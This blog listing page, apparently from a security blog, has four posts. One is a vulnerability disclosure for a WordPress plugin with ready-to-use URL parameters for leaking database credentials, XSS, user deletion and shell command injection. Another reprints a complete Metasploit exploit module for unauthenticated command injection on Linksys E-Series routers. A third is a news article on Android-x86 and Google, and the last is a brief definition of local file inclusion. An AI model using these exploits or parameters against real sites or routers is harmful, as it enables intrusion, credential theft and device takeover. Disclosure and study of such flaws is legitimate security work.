Slide 1 Slide 2 Slide 3 Slide 4 Slide 5
Showing posts with label vulnerabilities. Show all posts
By Anil Vishwakarma | 0 comment


This plugin is hailed by some as being one of the power tools of the "big boys" of net marketing, and according to author it  installed on

some 5,000 sites worldwide.



Unfortunately, the author is openly hostile at the suggestion that there are problems with his code: attempts to alert him to the problems with the

plugin resulted in a flurry of insults, accusations, and nasty_grams to me and some others working on the project.  He accused me of telling "blatant lies"

and fabricating screenshots of the vulnerabilities (!!!).  So here we are in the disclosure list.  Developers would do well to error on the side of

humility here and remember that the only acceptable response to a bug report you disagree with is "cannot reproduce," and this my sincere hope that

author gets therapy, security audit, or both: his customers deserve more than the incompetence and aggression.



VULNERABILITIES

* Disclosure of database credentials

* XSS Vulnerabilities

* Arbitrary user deletion

* Arbitrary code execution



AFFECTED VERSIONS

v3.8.012 thru v3.9.001



PROOF OF CONCEPT

Dictionary based URL scanning of  site where the plugin is installed

revealed numerous $_GET parameters that triggered special functionality

that rarely seemed properly checked for permissions.  The specific

vulnerabilities include:



DATABASE CREDENTIALS DISCLOSED

?i4w_dbinfo=



Prior to version 3.9.001, setting this parameter on a site where the plugin is installed would trigger the full database credentials to be printed,

included the database name, user, password, and encoding.

After version 3.9.001, this exploit requires that the user request an admin URL (e.g. as a registered subscriber).



XSS VULNERABILITIES

?decrypt=

?encrypt=



If set, both of these parameters will simply print what follows verbatim onto the page and exit: nothing else is printed.  A phishing attack is quite simple here because the attackers do not have to camouflage anything:

the remote Javascript file can simply generate the *entire* page.  Just a reminder that some hosts filter the $_GET parameters (e.g. escaping quotes) and not all browsers interpret malformed tags correctly, but there parameters are vulnerable to XSS attacks.  On some setups with caching, this may result in a persistent XSS attack when subsequent page views serve up the compromised page.



DELETE ARBITRARY USERS

?i4w_clearuser=&Email=



If these 2 parameters are defined, named user will be *Deleted* from Wordpress database (one catch). The i4w_clearuse_ parameter  match the API key used by  plugin, but if  plugin has not yet had license activated, then  API key is null, so attack succeeds.

 Wordpress login names are printed in comments or can be guessed (e.g. the ubiquitous "admin").



ARBITRARY CODE EXECUTION

?i4w_trace=; #



The i4w_trace parameter passes unescaped values to the system shell when the page is being requested by an admin (the user must be authenticated as an administrator for this to work). Put any code you want in between the ";" and the "#".  This makes for a dangerous phishing attack if you can convince an admin to click on a prepared link.
Read more...
By Anil Vishwakarma | 0 comment

Some Linksys E-Series Routers are vulnerable to an unauthenticated OS command injection. This vulnerability was used from the so called "TheMoon" worm. There are many Linksys systems that might be vulnerable including E4200, E3200, E3000, E2500, E2100L, E2000, E1550, E1500, E1200, E1000, E900. This Metasploit module was tested successfully against an E1500 v1.0.5.
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerEcho

def initialize(info = {})
super(update_info(info,
'Name' => 'Linksys E-Series TheMoon Remote Command Injection',
'Description' => %q{
Some Linksys E-Series Routers are vulnerable to an unauthenticated OS command
injection. This vulnerability was used from the so called "TheMoon" worm. There
are many Linksys systems that might be vulnerable including E4200, E3200, E3000,
E2500, E2100L, E2000, E1550, E1500, E1200, E1000, E900. This module was tested
successfully against an E1500 v1.0.5.
},
'Author' =>
[
'Johannes Ullrich', #worm discovery
'Rew', # original exploit
'infodox', # another exploit
'Michael Messner <devnull@s3cur1ty.de>', # Metasploit module
'juan vazquez' # minor help with msf module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'EDB', '31683' ],
[ 'BID', '65585' ],
[ 'OSVDB', '103321' ],
[ 'URL', '' ],
[ 'URL', '' ],
[ 'URL', '' ],
[ 'URL', '' ]
],
'DisclosureDate' => 'Feb 13 2014',
'Privileged' => true,
'Platform' => %w{ linux unix },
'Payload' =>
{
'DisableNops' => true
},
'Targets' =>
[
[ 'Linux mipsel Payload',
{
'Arch' => ARCH_MIPSLE,
'Platform' => 'linux'
}
],
[ 'Linux mipsbe Payload',
{
'Arch' => ARCH_MIPSBE,
'Platform' => 'linux'
}
],
],
'DefaultTarget' => 0
))
end


def execute_command(cmd, opts)
begin
res = send_request_cgi({
'uri' => '/tmUnblock.cgi',
'method' => 'POST',
'encode_params' => true,
'vars_post' => {
"submit_button" => "",
"change_action" => "",
"action" => "",
"commit" => "0",
"ttcp_num" => "2",
"ttcp_size" => "2",
"ttcp_ip" => "-h `#{cmd}`",
"StartEPI" => "1"
}
}, 2)
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end

def check
begin
res = send_request_cgi({
'uri' => '/tmUnblock.cgi',
'method' => 'GET'
})

if res && [200, 301, 302].include?(res.code)
return Exploit::CheckCode::Detected
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
end

Exploit::CheckCode::Unknown
end

def exploit
print_status("#{peer} - Trying to access the vulnerable URL...")

unless check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
end

print_status("#{peer} - Exploiting...")
execute_cmdstager
end

end
Read more...
By Anil Vishwakarma | 0 comment


Has Google been spreading FUD to discourage computer makers from using an Android OS retooled to run on legacy computers?

The maintainer of the Android-x86 Project has suggested that the Justice Department should investigate whether Google has been interfering with adoption of the open source code his community is developing.

The behind-the-scenes open source software development world is hardly free of rivalry and power plays. The release of the latest version of an open source Android OS to run as an alternative Linux distro may stall without the support of Android creator, Google.

There is a waiting market for the KitKat version of Android-X86 for desktops and laptops. That market is ripe, especially for its use as a thin client or in a dual OS setup, according to Chih-Wei Huang, project maintainer for the Android-x86 Project. Yet expected product releases have not appeared.

"For example, Asus announced the dual OS laptop TD300LA in the CES and got very positive feedback. However, Google asked to stop the product so Asus are unable to ship it, sadly," Huang told LinuxInsider.


 
Open Source Fair Play?

Google might not be willing to cooperate with a companion Android project for monetary reasons. However, Android code development can be pursued independently by the Android-x86 community or other vendors, suggested Huang.

"In my opinion, Google is becoming evil to use its monopolization in Android marketing. The U.S. Department of Justice should examine if Google violates the Antitrust law," he suggested.

The open source nature of the Android-x86 Project should not preclude or require official sanction by Google, said Ron Munitz, CTO of Nubo Software.

Nubo is developing an Android version that runs on servers. Munitz has volunteered as a programmer on parts of the Android-x86 Project.

No Gray Area

"It is not critical to have Google support on this project, as the Android-x86 Project is some sort of independent vendor. It obviously depends on the open sourcing of the Android code, which happens only after a Google device is announced, but otherwise it is independent," Munitz told LinuxInsider.

The only thing that increasingly is becoming problematic for other vendors is that the general purpose Android-x86 operating system is not part of the Google partnership program, he explained. In other words, if a device running the Android OS is not certified for acceptance, it is not eligible to use Google Apps.

Previously, this would not be such a huge issue, noted Munitz, but Google now integrates more services into its ecosystem and the standard Android Open Source Project code base.

Also, critical services such as Google Cloud Messaging require Google Services now. So some applications may not work with a particular product.

Still, "that is no different than any other non Google-partnered vendor," said Munitz.

Android Distro

A team of independent developers last month released the latest code for public testing of Android-x86 version 4.4-RC1 (KitKat-x86). The Android-x86 Project is porting the Android code to run on legacy computers.

The Android-x86 distro can be installed to hard drive on a desktop or laptop computer or run in live session from a CD or USB drive. The process is nearly identical to that of any other Linux distribution.

Google developed Android as an open source operating system for mobile phones and tablets. Over the last 18 months or so, several computer makers have used Google's Android OS to run on special hardware as an all-in-one desktop tablet built into a large touchscreen.

The Android-x86 project would make the Android OS more viable as an alternative operating system to run on computers powered by Intel and AMD x86 processors, including netbooks and laptops.

Deal Breaker

Asus executives did not respond to repeated requests for comment on Huang's assessment of the alleged thwarted hardware release. Google officials several times declined requests for interviews to discuss the Android-x86 Project.

Media accounts prior to CES 2014 in January reported plans for Asus to debut a new laptop/tablet hybrid featuring a 4th Generation Intel Haswell processor paired with a 1366 x 768 pixel display. Some product descriptions noted the product would be capable of dual-booting Windows 8.1 and Android.

Other reports suggested the Asus TD300LA was slated to launch during CES 2014 as a two-in-one device. The new feature would combine both the laptop and the tablet into a single processor.

Vapor Hardware

Asus did announce at CES 2014 the Transformer Book Duet TD300. The company described this device as a quad-mode, dual OS laptop and tablet running Windows and Android on an Intel 4th Gen Core processor.

The Asus website does show a press announcement for the Transformer Book Duet TD300, but the its search tool shows no results for the TD300LA. Even more interesting is that all media mention of either product ends with the close of CES 2014. There's no purchase information or product availability evident.

Lacking Partner Support

One of the biggest or most challenging hurdles Huang and his fellow coders faced in porting the Android code to work on x86 PCs and non-smartphone and tablet devices was a lack of vendor support. That lack of support included recognition from Google. In particular, there was no Board Support Package help for system development.

"Unlike Android phone/tablet makers, which can get BSP support from vendors, we need to develop everything ourselves, including the drivers and HALs (Hardware Abstraction Layer)," said Huang.

Vendors usually refuse to provide any help. An example is the Intel PowerVR GPU, he added.

"We are unable to provide hardware OpenGL acceleration on it because it requires proprietary libraries and firmware. I have asked Intel to provide the libraries to the public several times, but Intel just ignored me," he said.

Pockets of Interest

Despite the lack of cooperation or recognition from Google and its Android partner vendors, interest in the Android-x86 exists among some smaller vendors, according to Huang -- but they are not mainstream or even domestic.

Nevertheless, "they sent hardware to me for evaluating and development," Huang said.

For example, Tegatech (Tegav2 tablet), WeTab (Wetab tablet) and some small Taiwan vendors expressed considerable interest. Huang is not sure if they really have shipped Android-x86-based products, though. He thinks big vendors will be more included to work with Intel directly
Read more...
By Anil Vishwakarma | 0 comment

Local File Inclusion (LFI) is similar to a Remote File Inclusion vulnerability except instead of including remote files, only local files i.e. files on the current server can be included. The vulnerability is also due to the use of user-supplied input without proper validation. 







Read more...